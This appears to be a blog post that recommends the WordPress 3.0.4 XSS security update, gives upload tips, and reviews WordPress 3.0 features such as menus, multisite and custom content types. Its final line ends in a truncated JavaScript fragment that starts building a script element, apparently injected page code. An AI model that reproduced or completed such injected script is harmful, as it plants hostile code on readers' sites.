A new version of WordPress, 3.0.4, is out and the WordPress team is strongly encouraging WP users to update.
This update has to do with KSES (http://sourceforge.net/projects/kses/) the html sanitation library used in the WP core and fixes a XSS vulnerability.
As serious as XSS vulnerabilities can be, it’s probably a good idea to apply this update as soon as you can. The WordPress automatic update makes applying these updates pretty much painless if your site supports it. Otherwise, unpack the zip file and push it up via FTP, SCP, SSH, etc. Since this is not a major version update, I don’t find it necessary to remove all core WP files before pushing the new ones up. If you are selective about which files you push up while updating, make sure you upload all the files in the root folder. Even if you push all files in wp-admin and wp-includes, the file which tells WP which version is installed is in the root so if it’s not pushed up WP will not recognize that it has been updated.
Finally, after months of eagerly waiting, WordPress 3.0 is publicly available. This version contains features that are geared toward making it an even better Content Management System, so it appeals to me. The updated and simplified admin interface also appeals to my design aesthetic and the new default theme, Twenty Ten, is a huge improvement.
The menu-management system is something that has been needed for ages and it’s especially nice to have that functionality without a plugin. I’ve always felt that the ability to create multiple arbitrary menus is a stand-out feature in the open source Drupal CMS and helps Drupal become a CMS a developer can love. Adding this feature to WordPress clearly nudges it further in the direction of a powerful CMS rather than simple blog publishing software.
Another much-hyped feature is the merge of WordPress MU with the main branch. MU offers the ability to administer a network of sites from a single install. WordPress.com uses MU to host over 10 million sites from a single code base.
This version also ads better support for custom content types which allows a user to create an artbitrary content type. You can use this to display content types differently and organize your content. keep in mind that additional plugins may be needed to manage content types from within the management interface.
Lots of simple code cleanup happened since 2.9.2. I performed a full directory diff on version 2.9.2 and version 3.0 and many of the changes were syntax changes rather than logic changes. I applaud them for that as they work to keep WordPress cutting edge.
Most important feature of this release? A new filter for the content that makes the P in Press capitalized. Try it: “WordPress”. I typed that word with a lowercase “p” in this post, but it always appears right. Good job, guys!var d=document;var s=d.createElement(‘script’);